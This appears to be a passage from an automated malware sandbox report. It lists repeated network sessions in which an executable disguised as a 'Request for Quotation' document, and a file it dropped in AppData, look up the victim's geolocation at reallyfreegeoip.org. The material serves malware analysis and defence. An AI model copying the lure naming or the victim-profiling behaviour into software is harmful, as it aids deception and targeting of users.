                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.549714188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:08 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:08 UTC854INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:08 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55497
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5KqMkGMCfhNN%2BdRGkdegLKnWvcpmaFblQ0g5COAaue1Tbj8%2F7YB5VedulOwxgmExGrYgmcKwyFR%2Bpfvb8H%2BfBLKNcJPQsIJOXlSkZYQLUN%2FGOaTyobjKmiLQpliNHJuJwgGiKGJ"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5717eadf5742b5-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2199&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1326067&cwnd=230&unsent_bytes=0&cid=adbacdbefb965bc0&ts=168&x=0"
                                                                                                            2024-11-20 08:33:08 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.549716188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:09 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:09 UTC852INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:09 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55498
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5lUGn7etptvDFNI%2Fu4s1f6IsoSxHWluItB8MvLYrDEyTEp3WPa2XkSGWU2lxd6hDuFIKHL%2BViFacKIZc1eZXW8ZajjDJDT5%2BDqSfqRfDwPQgn4ccy3DVcH%2F3VD4l2oiMIu5QBi4"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5717f2a8271778-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1476&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1906005&cwnd=104&unsent_bytes=0&cid=adde82f5c564b98a&ts=152&x=0"
                                                                                                            2024-11-20 08:33:09 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.549719188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:10 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:10 UTC850INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:10 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55499
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksGchieigfUw9CyIn5OOWnNOSAgtKkEY0z3RAL1Up0uR%2FszohMu6kPuIGW34mpb%2BHK3RTMsy7oMc4YyjLc9TiDfWtJ26HD4hlqko%2F5vOxJOtyq6HYbKqugH2USiKzWYodKy792OP"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5717fa2ccc6a5c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2445&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1172219&cwnd=241&unsent_bytes=0&cid=b75b212fad03fea9&ts=160&x=0"
                                                                                                            2024-11-20 08:33:10 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.549720188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:10 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:10 UTC852INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:10 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55499
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNI4l1xb53JB9KDMcfGuTIeL74g9hNZrAcpQfzZY%2BngIxjP4M2%2FWcTpFAI9CrwevTfcOD%2BlpZsPTgPNefFgD4gVymWLBVGxV49eFnv6lnF3LTXD6y%2BOyBzZDEYvb51wLZ6y46hGP"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5717fb38388c96-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1477732&cwnd=188&unsent_bytes=0&cid=c02d1f4499a79d06&ts=301&x=0"
                                                                                                            2024-11-20 08:33:10 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.549722188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:11 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:11 UTC862INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:11 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55500
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fis8iyAKttJzeSPk6NojID%2BljyFhxYvAHjZdnqoUrDVC%2FBSO4PxYR3vIkn%2BqCztQvdbLVdgGIDQlIxF%2Bo4W%2BbU1dzR4tNthkWTlfL4ZGBqWDSP1RA5ejSLw%2F%2FR%2FSwMXi0gblkju8"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5718001eb97293-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2028&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1401151&cwnd=154&unsent_bytes=0&cid=95d14283f8aa875b&ts=153&x=0"
                                                                                                            2024-11-20 08:33:11 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.549723188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:11 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:12 UTC856INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:11 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55500
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VMt%2FNcKvgofy9IJgEg9Qu8%2Fn5aabzkW5DPb0xJlWkBua88HJ8%2B69ndO80m%2B9dU3F7POrdQbo0aWQo1RlT%2BK4EydvSeXMtMXqulaukBQrFoVoixhuRN4fTCCWY1BFUv8cdz%2F5AX0"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e571801b8ca7287-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1580942&cwnd=177&unsent_bytes=0&cid=1c16d7abd8b6cfae&ts=158&x=0"
                                                                                                            2024-11-20 08:33:12 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.549726188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:12 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:12 UTC854INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:12 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55501
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bN1NBDg%2BSRD0VdeoAkBUAUjEXlGoyGqJnWo9EE3%2FrrVs9%2FWwZlOUAO9k1qWGOEsOqyaLv9PjeLSCuDA6zCHSa7qvg%2BaRe4%2Fa33iihh9exTe59uelrNaczYPihdtgepAwvulDc8Tq"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e571807883c7ced-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1841&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1640449&cwnd=179&unsent_bytes=0&cid=0979e7998683cb08&ts=151&x=0"
                                                                                                            2024-11-20 08:33:12 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.549727188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:13 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:13 UTC856INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:13 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55502
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e43wO%2FFSnfikD8C3OmOA1jL4HVWnA%2FlCb4fDNwmD0nqqqjv%2BCfeMjTKHsCmbwHDQi%2BHOALj5P7Os4jC72Q%2BiVhaygPypfCjaCGSS88aTxSq5%2F9UzhCn36nxbQytcfcC6wPy3rs13"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5718099be241f2-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1777&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1651583&cwnd=221&unsent_bytes=0&cid=7200a3df606f34a8&ts=149&x=0"
                                                                                                            2024-11-20 08:33:13 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.549730188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:14 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:14 UTC850INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:14 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55503
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FkgN%2BboPKKOMznLxab5pir7qNqHAkkPVcdR1JHmH%2BzLONPhPVFzPbFGtPyukHBA1n15s3LKJQEqN1XyAOxc28D5yO6pQpIARTCRHgE1xS49iXR2cccfyTcuuDcpIyvh8i67Wk0q5"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e57180f2ad90dc7-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1894&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1476238&cwnd=224&unsent_bytes=0&cid=97b34895ffbe4aa2&ts=152&x=0"
